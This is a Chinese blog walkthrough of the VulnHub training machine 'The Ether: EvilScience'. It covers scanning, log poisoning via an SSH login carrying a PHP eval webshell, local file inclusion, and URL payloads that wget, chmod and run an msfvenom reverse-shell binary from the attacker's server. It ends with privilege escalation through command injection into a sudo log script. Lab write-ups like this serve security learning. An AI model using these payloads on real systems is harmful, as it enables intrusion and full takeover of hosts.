The Ether: EvilScience (v1.0.1)打靶渗透【附代码】(权限提升)

已于 2024-08-06 20:45:49 修改
阅读量595 收藏 4
点赞数 12
分类专栏: 打靶日常 文章标签: 网络 web安全 学习 网络安全 笔记
于 2024-08-06 20:44:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52487093/article/details/140965855
版权

靶机下载地址:

https://www.vulnhub.com/entry/the-ether-evilscience-v101,212/

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '00:0C:29:7F:50:FB'

1.2. 端口扫描

nmap -p- 192.168.7.172

1.3. 目录扫描

 dirb http://192.168.7.172

1.4. 敏感信息获取

2. WEB打点寻找漏洞点

2.1. 老规矩,逐个点击功能点,查看可以利用的功能点

1.点击about us中url带有file协议,疑似存在文件包含漏洞,尝试利用文件包含的几个方式获权限

2.由敏感信息可知其服务器中间件是apache,文件包含可通过日志文件包含获权,尝试拼接默认目录 -> /var/log/auth.log路径无法访问?存在报错??? -> 尝试利用ssh登录报错注入进错误访问日志中

ssh "<?php eval($_GET[cmd]);?>"@192.168.7.172

3.尝试burp抓包,查看数据包信息

2.2. GetShell

1.拼接命令

2.打开kali,利用msf生成shell -> 同时打开msf的内部监听

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=4444 -f elf > shell.elf

msfconsole

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.7.36
set lport 4444

3.新启一个http临时服务,让靶机远程下载我们的shell.elf文件[起的服务一定要在shell文件同一目录开启]

python -m http.server 8001

4.在靶机网页逐个拼接下方链接

/?file=/var/log/auth.log&d1no=system('wget+192.168.7.36:8001/shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('./shell.elf')%3b

监听器上线

3. 权限提升

3.1. 老规矩,msf上线先转shell,再利用python做持续化输出调配

shell
# 持续化
python -c 'import pty;pty.spawn("/bin/bash")'

3.2. 老规矩,查看用户执行命令权限

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

橙则Kucei
关注
专栏目录
Vulnhub靶机 The Ether: EvilScience (v1.0.1)(渗透测试详解)
2301_78721909的博客
08-03 287
Vulnhub靶机 The Ether: EvilScience (v1.0.1) 渗透测试拿shell
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习
我是小小白的博客
07-09 668
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习 前言 靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip 靶机难度:中级(CTF) 靶机发布日期:2017 年 10 月 30 日 靶机描述:最近,我一直喜欢为安全社区创造黑客挑战。这一新挑战囊括了一家名为 The Ether 的公司,该公司宣布了一种显着改变人类福利的灵丹妙药。由于他们正在开发的产品的性质,CDC 对这个群体产生了怀疑。 目标:
theEther_1.0.1靶机
m0_65285254的博客
08-04 255
将获取到的shell转变为交互式的shell:python -c 'import pty;pty.spawn("/bin/bash")'发现下在点击上面的ABOUT US之后,url里有着请求参数:/index.php?对可能存在文件包含漏洞的页面进行burp抓包,对file参数后面进行文件爆破。发现有一个/var/log/auth.log有日志记录,并且是ssh的记录。将会获得root权限 /var/log/auth.log | id。发送到 intruder模块。使用msfvenom。
The Ether: EvilScience靶机渗透实战总结
weixin_34220834的博客
08-20 1210
近期朋友给我发了一个靶机,说是他在日志注入的时候遇到了一点小问题,让我帮忙解决一下。下载下来之后,感觉这个靶机还是挺不错的,里边有一些套路,于是整理成一篇文章,感兴趣的小伙伴可以自己尝试一下。 靶机下载https://www.vulnhub.com/entry... 信息收集首先扫描内网,发现目标主机ip arp-scan -l ...
Vulnhub靶场渗透-theEther
paidx0
10-03 1305
前言 这次的靶机还是很好玩的,有点难度折腾了挺久,但方法对了那就很容易了 靶机ip(192.168.110.129) 攻击机ip(192.168.110.127) 网络NAT模式 不废话了直接开始 信息收集 打开网页简单看了看,没有过多的内容,是个基因的论文网站 网站没有太多的功能,而且扫目录也没扫到什么有价值的东西 最开始以为网站上的这些单词可能会用到,就利用他们做了个字典去爆破 ssh,显然我的方法就是错的 漏洞挖掘 注意到这个位置很有可能是利用存在读文件,简单尝试了几次Apache的日志文件
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
LYJ20010728的博客
08-07 1256
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE环境下载THE ETHER: EVILSCIENCE靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 THE ETHER: EVILSCIENCE靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 攻击机IP地址:192.168.246.129 渗透测试 信息搜集 用netdiscover查看一下:sudo netdiscover -r 192.168.246.0
ether:使用ssh的在线商店
05-18
醚 使用ssh的在线商店
ether:Unity软件包,用于可调制并具有各种效果的信号变量
02-21
Ether是专为Unity游戏引擎设计的一个软件包,它专注于提供可调制且具有各种效果的信号变量。在Unity中,信号变量(或事件系统)通常用于实现组件间的通信,允许不同部分的游戏逻辑相互触发和响应特定事件。这个...
Hi-Ether:基于计时器的Discord Webhook,将倒计时数天,直到产品发布
05-11
【Hi-Ether:基于计时器的Discord Webhook】是一种创新的技术解决方案,它结合了JavaScript编程语言和Discord的Webhook功能,用于在产品发布前进行倒计时通知。这个系统的核心是利用计时器机制,实时更新并显示距离...
capture the ether靶场题解(Lotteries)
m0_68764244的博客
10-25 1196
这题同样要求我们猜answer,但他的answer是在每次Guess的时候生成的,无法通过web3进行查询,但我们明白一件事,合约之间的调用是在同一个区块当中的,也就是说,如果我们通过攻击合约进行调用guess,那么我们攻击合约生成的answer与guess生成的answer是相同的。这关他的answer是随机生成的,根据创建时候的区块数量进行生成,并且由于没有进行修饰符修饰,默认为internal变量,所以我们无法直接看到,但任何数据在区块链上都是无法隐藏的,我们通过web3库就能直接拿到该值。
ENetIP_EC_V7.1.zip_ ENetIP_EC_V7.1_ENetIP_EC_V7.1_Ethernet_Ether
07-14
Ethernet/IP Communication
靶机实战-evilscience
滕财然的博客
01-28 743
evilscience靶机实战 文章目录evilscience靶机实战1、主机发现2、端口扫描3、端口详情扫描4、访问80端口5、提权方法一方法二 1、主机发现 目标IP:192.168.232.164 2、端口扫描 3、端口详情扫描 22端口–ssh、80端口–http 4、访问80端口 浏览网站,寻找有价值的信息 发现该网站有可能存在LFI(本地文件包含) 在about.php页面看...
evilscience 靶机渗透
weixin_44769042的博客
10-30 533
目录 主机发现 端口扫描 服务版本,操作系统扫描 开始渗透 反弹shell 提权 提权成功,得到flag 总结 主机发现 这两个ip mac地址是一样的,随便用一个就行 端口扫描 服务版本,操作系统扫描 开始渗透 1> web端目录扫描 这个页面有个下载,但是没啥用 扫了一堆都没啥用 2> 主页找到一个类似文件包含的特征点 尝试包含一下/etc/passwd,,结果没啥用 3> 用字典跑一下包含目录 找到几个...
Vulnhub 渗透练习(八)—— THE ETHER: EVILSCIENCE
shinygod的博客
02-19 640
本地文件包含:利用 ssh 登录产生错误日志写入一句话木马(ssh ''@ip)seclists 字典:https://github.com/danielmiessler/SecListssudo -l。
vulnhub靶机渗透 theEther
RestoreJustice的博客
03-19 247
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。192.168.110.131,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24。官方提供了一个提示:靶机中有一个相关的文件,在渗透过程中发挥重要作用,但是不要浪费时间试图去解密这个混淆后的文件。获取webshell。之后利用前面获得的一句话,执行命令,下载生成的木马,并且运行。
靶机渗透(十二)evilscience
qq_42180996的博客
05-23 1842
靶机evilscience 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.目录扫描(dirb) 3.文件包含漏洞利用 >另一种执行ls命令的方法 4...
【2024版】最新kali linux入门及常用简单工具介绍(非常详细)零基础入门到精通,收藏这一篇就够了_kalilinux
weixin_57514792的博客
10-07 1269
最新kali linux入门及常用简单工具介绍
HUAWEI_HCIA_实验指南_Lib1.5_配置通过STelnet登录系统
最新发布
IT_zhangsan
10-09 880
由于Telnet缺少安全的认证方式,而且传输过程采用TCP进行明文传输,存在很大的安全隐患,单纯提供Telnet服务容易招致主机IP地址欺骗、路由欺骗等恶意攻击。传统的Telnet和FTP等通过明文传送密码和数据的方式,已经慢慢不被接受。STelnet 是 Secure Telnet 的简称。在一个传统不安全网络环境中,服务器通过对用户端的认证及双向的数据加密,为网络终端访问提供安全的Telnet服务。
ether 00:0c:29:8f:1a:ff
06-07
Ether 00:0c:29:8f:1a:ff 是一个以太网MAC(Media Access Control)地址,MAC地址是网络设备的硬件标识符,由6个字节(48位)组成,通常用冒号分隔的12位十六进制数表示。每个字节的前导0被省略,所以00:0c:29:8f:1a:ff的完整形式是00-0c-29-8f-1a-ff。 MAC地址主要用于数据包在网络中的寻址,确保数据能准确地发送到正确的设备。每个设备都有一个唯一的MAC地址,就像人的身份证一样。00:0c:29:8f:1a:ff这个地址并不能直接告诉你它是哪个具体的设备,但如果你在一个网络环境中看到这个地址,可能是在查找某个设备或者在讨论网络通信的示例中使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

橙则Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值